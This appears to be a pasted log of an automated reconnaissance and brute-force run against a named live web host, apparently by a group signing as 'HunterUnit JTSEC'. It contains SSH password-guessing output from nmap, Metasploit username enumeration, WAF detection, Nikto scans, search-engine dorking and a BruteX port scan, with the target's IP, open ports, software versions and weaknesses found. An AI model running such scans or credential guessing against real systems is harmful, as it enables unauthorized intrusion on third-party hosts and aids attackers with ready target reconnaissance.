- NSE: [ssh-brute] Trying username/password pair: administrator:soccer
- NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: guest:soccer
- NSE: [ssh-brute] Trying username/password pair: user:soccer
- NSE: [ssh-brute] Trying username/password pair: web:soccer
- NSE: [ssh-brute] Trying username/password pair: test:soccer
- NSE: [ssh-brute] Trying username/password pair: root:anthony
- NSE: [ssh-brute] Trying username/password pair: admin:anthony
- NSE: [ssh-brute] Trying username/password pair: administrator:anthony
- NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: guest:anthony
- NSE: [ssh-brute] Trying username/password pair: user:anthony
- NSE: [ssh-brute] Trying username/password pair: web:anthony
- NSE: [ssh-brute] Trying username/password pair: test:anthony
- NSE: [ssh-brute] Trying username/password pair: root:friends
- NSE: [ssh-brute] Trying username/password pair: admin:friends
- NSE: [ssh-brute] Trying username/password pair: administrator:friends
- NSE: [ssh-brute] Trying username/password pair: webadmin:friends
- NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
- NSE: [ssh-brute] Trying username/password pair: netadmin:friends
- NSE: [ssh-brute] Trying username/password pair: guest:friends
- NSE: [ssh-brute] Trying username/password pair: user:friends
- NSE: [ssh-brute] Trying username/password pair: web:friends
- NSE: [ssh-brute] Trying username/password pair: test:friends
- NSE: [ssh-brute] Trying username/password pair: root:purple
- NSE: [ssh-brute] Trying username/password pair: admin:purple
- NSE: [ssh-brute] Trying username/password pair: administrator:purple
- NSE: [ssh-brute] Trying username/password pair: webadmin:purple
- NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
- NSE: [ssh-brute] Trying username/password pair: netadmin:purple
- NSE: [ssh-brute] Trying username/password pair: guest:purple
- NSE: [ssh-brute] Trying username/password pair: user:purple
- NSE: [ssh-brute] Trying username/password pair: web:purple
- NSE: [ssh-brute] Trying username/password pair: test:purple
- NSE: [ssh-brute] Trying username/password pair: root:angel
- NSE: [ssh-brute] Trying username/password pair: admin:angel
- NSE: [ssh-brute] Trying username/password pair: administrator:angel
- NSE: [ssh-brute] Trying username/password pair: webadmin:angel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
- NSE: [ssh-brute] Trying username/password pair: netadmin:angel
- NSE: [ssh-brute] Trying username/password pair: guest:angel
- NSE: [ssh-brute] Trying username/password pair: user:angel
- NSE: [ssh-brute] Trying username/password pair: web:angel
- NSE: [ssh-brute] Trying username/password pair: test:angel
- NSE: [ssh-brute] Trying username/password pair: root:butterfly
- NSE: [ssh-brute] Trying username/password pair: admin:butterfly
- NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
- NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: guest:butterfly
- NSE: [ssh-brute] Trying username/password pair: user:butterfly
- NSE: [ssh-brute] Trying username/password pair: web:butterfly
- NSE: [ssh-brute] Trying username/password pair: test:butterfly
- NSE: [ssh-brute] Trying username/password pair: root:jordan
- NSE: [ssh-brute] Trying username/password pair: admin:jordan
- NSE: [ssh-brute] Trying username/password pair: administrator:jordan
- NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
- Nmap scan report for video1.school-models.net (45.123.190.187)
- Host is up (0.20s latency).
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- | ssh-auth-methods:
- | Supported authentication methods:
- | publickey
- | gssapi-keyex
- | gssapi-with-mic
- |_ password
- | ssh-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 356 guesses in 181 seconds, average tps: 2.2
- | ssh-hostkey:
- | 1024 e5:f9:0b:6f:d8:5a:5e:ac:40:3b:a8:d1:9a:b4:f1:0c (DSA)
- |_ 2048 b2:cb:dc:52:94:8e:52:a9:f9:c4:bf:f7:5a:f3:77:0d (RSA)
- |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
- |_ssh-run: Failed to specify credentials and command to run.
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.39 (95%), Linux 2.6.32 (94%), Linux 2.6.32 or 3.10 (94%), WatchGuard Fireware 11.8 (94%), Linux 2.6.18 - 2.6.22 (94%), Synology DiskStation Manager 5.1 (94%), Linux 3.1 - 3.2 (93%), Linux 3.4 (93%), Linux 3.10 (92%), Linux 2.6.32 - 2.6.39 (92%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 11 hops
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 110.45 ms 10.13.0.1
- 2 ...
- 3 111.50 ms po101.gra-g2-a75.fr.eu (178.33.103.231)
- 4 ...
- 5 117.73 ms be100-1112.ams-5-a9.nl.eu (213.251.128.67)
- 6 139.96 ms be100-1167.var-5-a9.pl.eu (91.121.215.193)
- 7 140.19 ms vl2.var-6-a72.pl.eu (91.121.215.209)
- 8 ... 9
- 10 198.28 ms ddos-guard.net (185.129.101.85)
- 11 197.36 ms 45.123.190.187
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 208.51 seconds
- MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
- MMMMMMMMMMM MMMMMMMMMM
- MMMN$ vMMMM
- MMMNl MMMMM MMMMM JMMMM
- MMMNl MMMMMMMN NMMMMMMM JMMMM
- MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
- MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
- MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
- MMMNI MMMMM MMMMMMM MMMMM jMMMM
- MMMNI MMMMM MMMMMMM MMMMM jMMMM
- MMMNI MMMNM MMMMMMM MMMMM jMMMM
- MMMNI WMMMM MMMMMMM MMMM# JMMMM
- MMMMR ?MMNM MMMMM .dMMMM
- MMMMNm `?MMM MMMM` dMMMMM
- MMMMMMN ?MM MM? NMMMMMN
- MMMMMMMMNe JMMMMMNMMM
- MMMMMMMMMMNm, eMMMMMNMMNMM
- MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
- MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
- https://metasploit.com
- =[ metasploit v4.16.8-dev ]
- + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
- + -- --=[ 498 payloads - 40 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- [*] Processing /root/.msf4/msfconsole.rc for ERB directives.
- resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.log”
- [-] Unknown command: “spool.
- USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
- RHOSTS => video1.school-models.net
- [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
- RHOST => video1.school-models.net
- [*] 45.123.190.187:22 - SSH - Checking for false positives
- [*] 45.123.190.187:22 - SSH - Starting scan
- [-] 45.123.190.187:22 - SSH - User 'admin' not found
- [-] 45.123.190.187:22 - SSH - User 'administrator' not found
- [-] 45.123.190.187:22 - SSH - User 'anonymous' not found
- [-] 45.123.190.187:22 - SSH - User 'backup' not found
- [-] 45.123.190.187:22 - SSH - User 'bee' not found
- [-] 45.123.190.187:22 - SSH - User 'ftp' not found
- [-] 45.123.190.187:22 - SSH - User 'guest' not found
- [-] 45.123.190.187:22 - SSH - User 'GUEST' not found
- [-] 45.123.190.187:22 - SSH - User 'info' not found
- [-] 45.123.190.187:22 - SSH - User 'mail' not found
- [-] 45.123.190.187:22 - SSH - User 'mailadmin' not found
- [-] 45.123.190.187:22 - SSH - User 'msfadmin' not found
- [-] 45.123.190.187:22 - SSH - User 'mysql' not found
- [-] 45.123.190.187:22 - SSH - User 'nobody' not found
- [-] 45.123.190.187:22 - SSH - User 'oracle' not found
- [-] 45.123.190.187:22 - SSH - User 'owaspbwa' not found
- [-] 45.123.190.187:22 - SSH - User 'postfix' not found
- [-] 45.123.190.187:22 - SSH - User 'postgres' not found
- [-] 45.123.190.187:22 - SSH - User 'private' not found
- [-] 45.123.190.187:22 - SSH - User 'proftpd' not found
- [-] 45.123.190.187:22 - SSH - User 'public' not found
- [-] 45.123.190.187:22 - SSH - User 'root' not found
- [-] 45.123.190.187:22 - SSH - User 'superadmin' not found
- [-] 45.123.190.187:22 - SSH - User 'support' not found
- [-] 45.123.190.187:22 - SSH - User 'sys' not found
- [-] 45.123.190.187:22 - SSH - User 'system' not found
- [-] 45.123.190.187:22 - SSH - User 'systemadmin' not found
- [-] 45.123.190.187:22 - SSH - User 'systemadministrator' not found
- [-] 45.123.190.187:22 - SSH - User 'test' not found
- [-] 45.123.190.187:22 - SSH - User 'tomcat' not found
- [-] 45.123.190.187:22 - SSH - User 'user' not found
- [-] 45.123.190.187:22 - SSH - User 'webmaster' not found
- [-] 45.123.190.187:22 - SSH - User 'www-data' not found
- [-] 45.123.190.187:22 - SSH - User 'Fortimanager_Access' not found
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
- [+] 45.123.190.187:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
- [*] video1.school-models.net:22 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 53 closed... skipping.
- + -- --=[Port 79 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- + -- ----------------------------=[Checking for WAF]=------------------------ -- +
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://video1.school-models.net
- Generic Detection results:
- The site http://video1.school-models.net seems to be behind a WAF or some sort of security solution
- Reason: Blocking is being done at connection/packet level.
- Number of requests: 12
- + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
- http://video1.school-models.net [200 OK] HTTPServer[nginx/1.10.2], IP[45.123.190.187], JQuery[1.7.1], Script[JavaScript], Title[SCHOOL MODELS|ORIENTAL SCHOOLGIRLS NONUDE| SCHOOL MODELS VIDEO ISSUE 1], nginx[1.10.2]
- __ ______ _____
- \ \/ / ___|_ _|
- \ /\___ \ | |
- / \ ___) || |
- /_/\_|____/ |_|
- + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
- + -- --=[Target: video1.school-models.net:80
- + -- --=[Site not vulnerable to Cross-Site Tracing!
- + -- --=[Site not vulnerable to Host Header Injection!
- + -- --=[Site vulnerable to Cross-Frame Scripting!
- + -- --=[Site vulnerable to Clickjacking!
- HTTP/1.1 405 Not Allowed
- Server: nginx/1.10.2
- Date: Sun, 01 Oct 2017 21:24:14 GMT
- Content-Type: text/html
- Content-Length: 173
- Connection: close
- <html>
- <head><title>405 Not Allowed</title></head>
- <body bgcolor="white">
- <center><h1>405 Not Allowed</h1></center>
- <hr><center>nginx/1.10.2</center>
- </body>
- </html>
- HTTP/1.1 200 OK
- Server: nginx/1.10.2
- Date: Sun, 01 Oct 2017 21:24:15 GMT
- Content-Type: text/html; charset=UTF-8
- Content-Length: 13395
- Connection: keep-alive
- Last-Modified: Sat, 07 Nov 2015 09:35:35 GMT
- ETag: "3453-523f0150007c0"
- Accept-Ranges: bytes
- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
- "http://www.w3.org/TR/html4/loose.dtd">
- <html>
- <head>
- <title>SCHOOL MODELS|ORIENTAL SCHOOLGIRLS NONUDE| SCHOOL MODELS VIDEO ISSUE 1</title>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
- <script src="js/jquery-1.7.1.min.js"></script>
- <script>
- $.getJSON("http://jsonip.com?callback=?", function (data) {
- $.get( "http://stats.bulkfilms.net/to_face.php", { refer: document.referrer, time: Math.floor(Date.now() / 1000), ip: data.ip, to_pl: document.location.href } );
- });
- </script>
- <style type="text/css">
- <!--
- body {
- margin-left: -1px;
- margin-top: -1px;
- background-color: #e69e20;
- }
- .style1 {
- color: #AC2068;
- font-weight: bold;
- font-family: Ve
- + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
- + -- --=[Checking if X-Content options are enabled on video1.school-models.net...
- + -- --=[Checking if X-Frame options are enabled on video1.school-models.net...
- + -- --=[Checking if X-XSS-Protection header is enabled on video1.school-models.net...
- + -- --=[Checking HTTP methods on video1.school-models.net...
- Allow: GET,HEAD,POST,OPTIONS,TRACE
- + -- --=[Checking if TRACE method is enabled on video1.school-models.net...
- + -- --=[Checking for META tags on video1.school-models.net...
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
- + -- --=[Checking for open proxy on video1.school-models.net...
- <html>
- <head><title>502 Bad Gateway</title></head>
- <body bgcolor="white">
- <center><h1>502 Bad Gateway</h1></center>
- <hr><center>nginx/1.10.2</center>
- </body>
- </html>
- + -- --=[Enumerating software on video1.school-models.net...
- Server: nginx/1.10.2
- + -- --=[Checking if Strict-Transport-Security is enabled on video1.school-models.net...
- + -- --=[Checking for Flash cross-domain policy on video1.school-models.net...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /crossdomain.xml was not found on this server.</p>
- </body></html>
- + -- --=[Checking for Silverlight cross-domain policy on video1.school-models.net...
- <html>
- <head><title>502 Bad Gateway</title></head>
- <body bgcolor="white">
- <center><h1>502 Bad Gateway</h1></center>
- <hr><center>nginx/1.10.2</center>
- </body>
- </html>
- + -- --=[Checking for HTML5 cross-origin resource sharing on video1.school-models.net...
- + -- --=[Retrieving robots.txt on video1.school-models.net...
- # vestacp autogenerated robots.txt
- User-agent: *
- Crawl-delay: 10
- + -- --=[Retrieving sitemap.xml on video1.school-models.net...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /sitemap.xml was not found on this server.</p>
- </body></html>
- + -- --=[Checking cookie attributes on video1.school-models.net...
- + -- --=[Checking for ASP.NET Detailed Errors on video1.school-models.net...
- + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 45.123.190.187
- + Target Hostname: video1.school-models.net
- + Target Port: 80
- + Start Time: 2017-10-01 20:30:25 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: nginx/1.10.2
- + Server leaks inodes via ETags, header found with file /, fields: 0x3453 0x523f0150007c0
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
- + Scan terminated: 9 error(s) and 4 item(s) reported on remote host
- + End Time: 2017-10-01 20:35:56 (GMT-4) (331 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
- [+] Screenshot saved to /usr/share/sniper/loot/screenshots/video1.school-models.net-port80.jpg
- + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
- + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
- _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
- (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
- (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
- \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
- \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
- /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
- [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
- __[ ! ] Neither war between hackers, nor peace for the system.
- __[ ! ] http://blog.inurl.com.br
- __[ ! ] http://fb.com/InurlBrasil
- __[ ! ] http://twitter.com/@googleinurl
- __[ ! ] http://github.com/googleinurl
- __[ ! ] Current PHP version::[ 7.0.22-3 ]
- __[ ! ] Current script owner::[ root ]
- __[ ! ] Current uname::[ Linux Kali 4.12.0-kali2-amd64 #1 SMP Debian 4.12.12-2kali1 (2017-09-13) x86_64 ]
- __[ ! ] Current pwd::[ /usr/share/sniper ]
- __[ ! ] Help: php inurlbr.php --help
- ------------------------------------------------------------------------------------------------------------------------
- [ ! ] Starting SCANNER INURLBR 2.1 at [01-10-2017 21:48:25]
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-video1.school-models.net.txt ]
- [ INFO ][ DORK ]::[ site:video1.school-models.net ]
- [ INFO ][ SEARCHING ]:: {
- [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.vc ]
- [ INFO ][ SEARCHING ]::
- -[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE API ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.ly ID: 012873187529719969291:yexdhbzntue ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
- [ INFO ] Not a satisfactory result was found!
- [ INFO ] [ Shutting down ]
- [ INFO ] [ End of process INURLBR at [01-10-2017 21:48:35]
- [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
- [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-video1.school-models.net.txt ]
- |_________________________________________________________________________________________
- \_________________________________________________________________________________________/
- + -- --=[Port 110 closed... skipping.
- + -- --=[Port 111 closed... skipping.
- + -- --=[Port 135 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 161 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 389 closed... skipping.
- + -- --=[Port 443 closed... skipping.
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 623 closed... skipping.
- + -- --=[Port 624 closed... skipping.
- + -- --=[Port 1099 closed... skipping.
- + -- --=[Port 1433 closed... skipping.
- + -- --=[Port 2049 closed... skipping.
- + -- --=[Port 2121 closed... skipping.
- + -- --=[Port 3306 closed... skipping.
- + -- --=[Port 3310 closed... skipping.
- + -- --=[Port 3128 closed... skipping.
- + -- --=[Port 3389 closed... skipping.
- + -- --=[Port 3632 closed... skipping.
- + -- --=[Port 4443 closed... skipping.
- + -- --=[Port 5432 closed... skipping.
- + -- --=[Port 5800 closed... skipping.
- + -- --=[Port 5900 closed... skipping.
- + -- --=[Port 5984 closed... skipping.
- + -- --=[Port 6000 closed... skipping.
- + -- --=[Port 6667 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8100 closed... skipping.
- + -- --=[Port 8080 closed... skipping.
- + -- --=[Port 8180 closed... skipping.
- + -- --=[Port 8443 closed... skipping.
- + -- --=[Port 8888 closed... skipping.
- + -- --=[Port 10000 closed... skipping.
- + -- --=[Port 16992 closed... skipping.
- + -- --=[Port 27017 closed... skipping.
- + -- --=[Port 27018 closed... skipping.
- + -- --=[Port 27019 closed... skipping.
- + -- --=[Port 28017 closed... skipping.
- + -- --=[Port 49152 closed... skipping.
- + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
- #######################################################################################################################################
- oooooo oooo .o. .oooooo..o ooooo ooo .oooooo.
- `888. .8' .888. d8P' `Y8 `888' `8' d8P' `Y8b
- `888. .8' .88888. Y88bo. 888 8 888 888
- `888.8' .8' `888. `ZY8888o. 888 8 888 888
- `888' .88ooo8888. `0Y88b 888 8 888 888
- 888 .8' `888. oo .d8P `88. .8' `88b d88'
- o888o o88o o8888o 88888888P' `YbodP' `Y8bood8P'
- Welcome to Yasuo v2.3
- Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
- #######################################################################################################################################
- I, [2017-10-01T21:48:38.866845 #12937] INFO -- : Initiating port scan
- I, [2017-10-01T21:53:44.060468 #12937] INFO -- : Using nmap scan output file logs/nmap_output_2017-10-01_21-48-38.xml
- W, [2017-10-01T21:53:44.087772 #12937] WARN -- : Yasuo did not find any potential hosts to enumerate
- + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +
- + -- ----------------------------=[Running Brute Force]=--------------------- -- +
- __________ __ ____ ___
- \______ \_______ __ ___/ |_ ____ \ \/ /
- | | _/\_ __ \ | \ __\/ __ \ \ /
- | | \ | | \/ | /| | \ ___/ / \
- |______ / |__| |____/ |__| \___ >___/\ \
- \/ \/ \_/
- + -- --=[BruteX v1.7 by 1N3
- + -- --=[http://crowdshield.com
- ################################### Running Port Scan ##############################
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-01 21:53 EDT
- Nmap scan report for video1.school-models.net (45.123.190.187)
- Host is up (0.22s latency).
- Not shown: 21 closed ports, 3 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 22/tcp open ssh
- 80/tcp open http
- Nmap done: 1 IP address (1 host up) scanned in 14.13 seconds
- ##############################################################################################################################################################################################################################################################################
- HunterUnit JTSEC full Recon Anonymous #2
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement